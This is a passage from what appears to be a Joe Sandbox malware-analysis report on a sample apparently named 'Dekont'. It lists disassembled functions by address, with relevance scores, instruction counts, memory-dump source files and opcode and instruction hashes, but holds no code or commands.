                                  • Instruction ID: c090c7e2017de83ea71c231e1e90528c4875cdd8648cb57d6f5e1d52d482a84b
                                  • Opcode Fuzzy Hash: 3aa0949e95894d183702e6aea197a40c34245cd54ebf5eaf9fa2eb61b5087f69
                                  • Instruction Fuzzy Hash: CF11C132240604EFC722DB6DCD40F9A77ACEF99B50F114068F681DB261DA76E901CBA0
                                  Function 010066B0 Relevance: .1, Instructions: 61COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fea71589d230174bcf6568f924f1d29a0f145c9a4132f06f65e395d2833910c7
                                  • Instruction ID: e4959332d339a9c2abb0610940ebf47ffff497bd6c7e97ccafaa19e6858dfc98
                                  • Opcode Fuzzy Hash: fea71589d230174bcf6568f924f1d29a0f145c9a4132f06f65e395d2833910c7
                                  • Instruction Fuzzy Hash: 01110172A00240DFEB76CF5DC980A0ABBEABF84300F0140B9E9899B351F635DD00DB90
                                  Function 0109A8E4 Relevance: .1, Instructions: 61COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                  • Instruction ID: 7f58811c12fff78d1949dbaa07b71cec57135aaba31bdc55d425edc794c9d4f8
                                  • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                  • Instruction Fuzzy Hash: 1D11E236A00909EFDF19CB58CC15A9DBBF5FF84310F058269E885A7380E635AE01DB80
                                  Function 00FD0AD0 Relevance: .1, Instructions: 61COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                  • Instruction ID: eb4a210ecba070fd7b81e263a622c2614251430dd868437c2c0487f5ced63565
                                  • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                  • Instruction Fuzzy Hash: 272106B5A00B459FD3A0CF29C441B52BBF5FB48B20F10492EE88ACBB40E771E814CB90
                                  Function 0105E7E1 Relevance: .1, Instructions: 59COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                  • Instruction ID: b8701966adcc6880fca06d471e290f1e7a397343942ac0e6d1ea66b241b04a1c
                                  • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                  • Instruction Fuzzy Hash: A8119132600600EFE7A19F49C840B6BFBE6EB45754F098469EDCD9B250D775DE40D790
                                  Function 00FF27ED Relevance: .1, Instructions: 58COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 53974560d7b01765af3b497399f7ac05ea4a247721d69a98e4d0872d07c2ec55
                                  • Instruction ID: df56caf63d9c5f97202d9bd5cdceaede8e6de4981ba2c3fb3c21be88083116a7
                                  • Opcode Fuzzy Hash: 53974560d7b01765af3b497399f7ac05ea4a247721d69a98e4d0872d07c2ec55
                                  • Instruction Fuzzy Hash: 7E010832705688ABE326A26A9C58F677B8CEF80394F0500A5F981CB291D654DC00D261
                                  Function 00FD4690 Relevance: .1, Instructions: 57COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a8788c56b86c2349ea6b892307fcfbf099e6fd8b33044860fb91d16b04d7a649
                                  • Instruction ID: 4f9ac937c8c6034ba4b4228e259c0a746c383ad60db8a53b4d34a86c2e0b936c
                                  • Opcode Fuzzy Hash: a8788c56b86c2349ea6b892307fcfbf099e6fd8b33044860fb91d16b04d7a649
                                  • Instruction Fuzzy Hash: D311AC76A00694AFCB25CF59D881B5677AAEB86B64F19411AF804CB390C774FC40EF60
                                  Function 01006620 Relevance: .1, Instructions: 56COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8ddc81b93e14013cc510fb1bdfe644c5d3aae02ffa26cbc774e5f6be05703274
                                  • Instruction ID: 1c491da806741b73eea4760149bdf9236cf7b06ff85c5c5cb527c18e2dc4d986
                                  • Opcode Fuzzy Hash: 8ddc81b93e14013cc510fb1bdfe644c5d3aae02ffa26cbc774e5f6be05703274
                                  • Instruction Fuzzy Hash: 31110632900714ABEB22DF99CC80B4EFBFAEF48740F540095EA41B7241C736AD108B60
                                  Function 00FFEA2E Relevance: .1, Instructions: 56COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5bfdf50328bf82b8356465757ad578ca0d284111648290191a1b4983ed60edbf
                                  • Instruction ID: e8a7ff53c872d95c3d08cbaf1248b6066e4cafb1b62533249a7f07cad3be8aa1
                                  • Opcode Fuzzy Hash: 5bfdf50328bf82b8356465757ad578ca0d284111648290191a1b4983ed60edbf
                                  • Instruction Fuzzy Hash: D201C07560020C9FC325DB15D844F26B7E9EF81724F24816AE1058B271C778AC42DF94
                                  Function 00FFE53E Relevance: .1, Instructions: 55COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                  • Instruction ID: 0be966d5134163159325872bd257f8fb57e74c62f7011848084d5b92d3bf01d5
                                  • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                  • Instruction Fuzzy Hash: 9311E972A016CA9FD723971DCD48B2537D8AF80758F1D00E1EE81C76A3E72CC942E252
                                  Function 0105E75D Relevance: .1, Instructions: 54COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                  • Instruction ID: e5458053324330cd22ccc0ae4b2d11963f8f554450714e0513f7e9fe5a5c7038
                                  • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                  • Instruction Fuzzy Hash: 1B01C032600509AFE7A19B58CD00B5BFAE9FF41B50F198065FEC99B260E775DE40D790
                                  Function 00FCA250 Relevance: .1, Instructions: 52COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                  • Instruction ID: 16b3398fa58796d7dd2ed7e7ddc0309d213715ef4d53f61869818008604fd26a
                                  • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                  • Instruction Fuzzy Hash: F5012632805B2A9BCB308F15D941FB27BB5EF55B78700852DFC958B280C335E800EB61
                                  Function 0104E1D0 Relevance: .1, Instructions: 51COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2dc8b49f56baf09826a8ca70ceef0eec0b2fdcde277756c94d45562ab9881861
                                  • Instruction ID: 37ffd38199d7688882bd2e6a7aa2bd89110869e302a6486a9747cbebc7403c13
                                  • Opcode Fuzzy Hash: 2dc8b49f56baf09826a8ca70ceef0eec0b2fdcde277756c94d45562ab9881861
                                  • Instruction Fuzzy Hash: BD11AD32241640EFDB26EF59CD91F56BBB9FF44B44F2400B5FA059B6A2C239ED01DA90
                                  Function 00FD6259 Relevance: .1, Instructions: 51COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 07d74cf9de7d235b89cc543594be1b25d252700def664e2a0e51ffc6f7797b37
                                  • Instruction ID: d76a39e4e88c6c48549782e0fdfebb04dcb162b2e70a96ab5fba747878e2b81c
                                  • Opcode Fuzzy Hash: 07d74cf9de7d235b89cc543594be1b25d252700def664e2a0e51ffc6f7797b37
                                  • Instruction Fuzzy Hash: B711AC70941228ABEF25EB64CC82FE8B3B4BF08710F6041D5A359E61E0DB349E81DF84
                                  Function 01006DA0 Relevance: .1, Instructions: 51COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                  • Instruction ID: 90448639d2edc2d6d13316357c3af6decf766417ebf89a9f39b3c3253b5aed7c
                                  • Opcode Fuzzy Hash: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                  • Instruction Fuzzy Hash: 6701683160038467FF269B19D804B9F7FA6DB40B10F004055BA425F2C0D7B5DCA0C3E0
                                  Function 00FD208A Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                  • Instruction ID: 448c1cf4dd3c188bf353d8c875ace82e1b098052a3e61a1286bf1fee4ef5966e
                                  • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                  • Instruction Fuzzy Hash: 850128336001118BDF518A29DC88B927767BFD4710F6941A6ED458F346DA71CC81E7D0
                                  Function 01056050 Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4bd09c387e28c34a3632f944fff3d781f1602c8099953c73d5d54f093363c84d
                                  • Instruction ID: 77aac80c432152f905100c8231af6e09701184c7e86bff06ac156160c31c2139
                                  • Opcode Fuzzy Hash: 4bd09c387e28c34a3632f944fff3d781f1602c8099953c73d5d54f093363c84d
                                  • Instruction Fuzzy Hash: CA111772900119ABCB16DB94CC80DEFBBBDEF48258F044166A906A7211EA35AA55CBA0
                                  Function 01066500 Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 902c3948ab9d808a67079a01eb0b0a4ab0467367e8e8bae1aa4bd3c9e4bb4649
                                  • Instruction ID: 4073f87a5464d36024bf7c9e5fbb7bb2daa82b6e8679d0f19fab3425e562ec5d
                                  • Opcode Fuzzy Hash: 902c3948ab9d808a67079a01eb0b0a4ab0467367e8e8bae1aa4bd3c9e4bb4649
                                  • Instruction Fuzzy Hash: 2811C4366441459FD711CF59D801BA6FBF9FB9A314F088199E888CB316D732EC81CBA1
                                  Function 0105C810 Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 979f1230fd3126c63e285448dad9fd2bc966033724553fcaf842eaceccc25ba9
                                  • Instruction ID: 32aa8d86b47799a59fcaaeea29ab81ef973635a39b196ef514606bfae9e253da
                                  • Opcode Fuzzy Hash: 979f1230fd3126c63e285448dad9fd2bc966033724553fcaf842eaceccc25ba9
                                  • Instruction Fuzzy Hash: 721118B1A0020D9FCB00DFA9D545AAEBBF8FF58350F10806AB945E7351D678EA018BA4
                                  Function 0107EA60 Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b6f9ccacc2b2c90b31fd867c51431d952f41605245674571cb7d73590086c8d7
                                  • Instruction ID: 7ec7f575f24c3e9908d6cbe97368f1c894a9a98ad23fa90611a31d819983b5fe
                                  • Opcode Fuzzy Hash: b6f9ccacc2b2c90b31fd867c51431d952f41605245674571cb7d73590086c8d7
                                  • Instruction Fuzzy Hash: 2001F131942210AFC772BF1AC80496EBBE9FF41750B1884EEF1801B612CB24FC41DB94
                                  Function 00FCC020 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                  • Instruction ID: 88fd6d368fbc13c980b3a1ccf8261d8167065f1c7f7423fe5415fff3c0604414
                                  • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                  • Instruction Fuzzy Hash: 5D012832500B55DFDB22D6AAC900FA777E9FFC4310F05481DE586CB540DAB4E901D790
                                  Function 010120F0 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 82dd402e66433a8f8306e9bdc1246f6eab361f25827dfd476d60ea31d80c74c7
                                  • Instruction ID: e3d6a8e68d8924c26689b7529b0d1191cad50ee328d0bee13851a6199ac279b2
                                  • Opcode Fuzzy Hash: 82dd402e66433a8f8306e9bdc1246f6eab361f25827dfd476d60ea31d80c74c7
                                  • Instruction Fuzzy Hash: A611AD75A0024DEFCB01EF64C855AAE7BB9FB44340F104099F9429B254DB39AE01CB90
                                  Function 0100E5CF Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0f580a00ce51042b0fdbd6b9d17db8654f34cb20a8b769b132b33c960dd2fa81
                                  • Instruction ID: d8d8895aa0ad4b344e6e0a3f270c746ccdb9861545645473ca1ac4f22cc004bf
                                  • Opcode Fuzzy Hash: 0f580a00ce51042b0fdbd6b9d17db8654f34cb20a8b769b132b33c960dd2fa81
                                  • Instruction Fuzzy Hash: 2201F7B12006407FD351AB7ECD85E1BB7ECFF88750B000679B10593652EB68EC01CAE0
                                  Function 010669C0 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ba77496be5f30d55791ba375c7860d3aa660df211039d88bffdabed455e43992
                                  • Instruction ID: fa29d113f4201b2fba2d15f15e56fde3a135734f245050141c48e72da7ef6034
                                  • Opcode Fuzzy Hash: ba77496be5f30d55791ba375c7860d3aa660df211039d88bffdabed455e43992
                                  • Instruction Fuzzy Hash: 2F01FC322142059BC320DF7AC8499AFFBECFF84760F114169F99987180E7359901CBD1
                                  Function 0105C460 Relevance: .0, Instructions: 48COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ca56aaaa0c0f9f14f098307c4d4fe6b2fa7f42123becdd8f3644fd7f13a6b175
                                  • Instruction ID: e93028a5cf89241f5792cae2d475bb66134483fa728fe655ae38746296880484
                                  • Opcode Fuzzy Hash: ca56aaaa0c0f9f14f098307c4d4fe6b2fa7f42123becdd8f3644fd7f13a6b175
                                  • Instruction Fuzzy Hash: F5115B75A0024DABDF55EF68C945EAE7BB9FB48344F008099BD4197350DB39EE11CB90
                                  Function 0105C97C Relevance: .0, Instructions: 48COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fb0fa634d1ad8f0fda93f7a4b648a9f82f85502c33d3a4e5b34ebadd031d0507
                                  • Instruction ID: d2cbfe967b2e0811c32bc189d2cf9d5dc341f9e40f1a1acb25098f451f7731bd
                                  • Opcode Fuzzy Hash: fb0fa634d1ad8f0fda93f7a4b648a9f82f85502c33d3a4e5b34ebadd031d0507
                                  • Instruction Fuzzy Hash: 1F1179B16083089FC700DF69C94699BBBF8EF98310F00855AB998D7391E634E900CB92
                                  Function 0105CA11 Relevance: .0, Instructions: 48COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 49e96b7cc19acaa7c57828f0bfea9b6a07a9ea43ee00d48575db4677dd2b3e9f
                                  • Instruction ID: 3e4c151293ff3bb6f813a58a99e388fa6dd2c049ee47fa58a323af8e92063444
                                  • Opcode Fuzzy Hash: 49e96b7cc19acaa7c57828f0bfea9b6a07a9ea43ee00d48575db4677dd2b3e9f
                                  • Instruction Fuzzy Hash: 70118BB16083089FC310DF69C94198BBBE8FF99350F00855EF998D73A5E634E900CB92
                                  Function 010A4A80 Relevance: .0, Instructions: 48COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                  • Instruction ID: 33706928eb93aac45c4c4e611cc623d3df0c77f185997899030168a7d4831f21
                                  • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                  • Instruction Fuzzy Hash: CD01243A2006059FD7258AA9C844F96BBEAFFD1300F484859E682CB650DAF4F840C790
                                  Function 00FEE016 Relevance: .0, Instructions: 46COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                  • Instruction ID: 172de33b2913d62f7bd5894d441e823c7e0e17da4936aa4dc9fbee4c76f4461f
                                  • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                  • Instruction Fuzzy Hash: 28018F722005D49FD322871ED948F6A77D8EF44754F0944A1FA45CB691D6B8DD40D621
                                  Function 00FC826B Relevance: .0, Instructions: 46COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8708c242c0c5c7e2ce5b4137965c0cf2486708d7b9b2cd06a328cd036fb33856
                                  • Instruction ID: 3a9e8d086c6c7601fda6b25a7b6d385c19a18dc8e8fc40bc2d65aec1524beb65
                                  • Opcode Fuzzy Hash: 8708c242c0c5c7e2ce5b4137965c0cf2486708d7b9b2cd06a328cd036fb33856
                                  • Instruction Fuzzy Hash: 3201D472A10506DFC714DB65DA16FEFB7A8FF40760B15802D9D41AB241DE30DD02E690
                                  Function 0107EB50 Relevance: .0, Instructions: 46COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 958b5bfe2eae7ef6ab0cad9fa6a7b0a32bc28307d59d5972e2bac8912f8f2f36
                                  • Instruction ID: 8d1ee419e05d9d24c9b18a64d6ea0ffb710214a7456b9070d3ac602a10f53a9e
                                  • Opcode Fuzzy Hash: 958b5bfe2eae7ef6ab0cad9fa6a7b0a32bc28307d59d5972e2bac8912f8f2f36
                                  • Instruction Fuzzy Hash: DA01F271641700AFD3315F1AD901F1BBEA8FF44F50F11446EB2868F3A0D6B598409B68
                                  Function 00FD2582 Relevance: .0, Instructions: 45COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 30bf16aa52b58f399816d884a24682a41f428c353caa6db3db55153c1c018ad0
                                  • Instruction ID: b0f9503b5cf676f26e2fd607b1914c25888d02873628db1c9dd7863a896e7824
                                  • Opcode Fuzzy Hash: 30bf16aa52b58f399816d884a24682a41f428c353caa6db3db55153c1c018ad0
                                  • Instruction Fuzzy Hash: EBF0F933641B20B7C7319B5ADC40F577AAADB84BA0F184029B50597740CA34DD01EAE0
                                  Function 00FFC073 Relevance: .0, Instructions: 43COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                  • Instruction ID: 1c0ac45ee99d25067384f245923b787d4fdda2524b40dfe45246c6420e45cca5
                                  • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                  • Instruction Fuzzy Hash: F3F0C2B2A00A25ABD324CF4DDD40E67F7EADFC0B90F048128A645C7220EA31DD05CB90
                                  Function 00FCC310 Relevance: .0, Instructions: 43COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                  • Instruction ID: aee6e7370e0e16d1ff565339352057f14ca67584dc391543a72ef010d2c2ab98
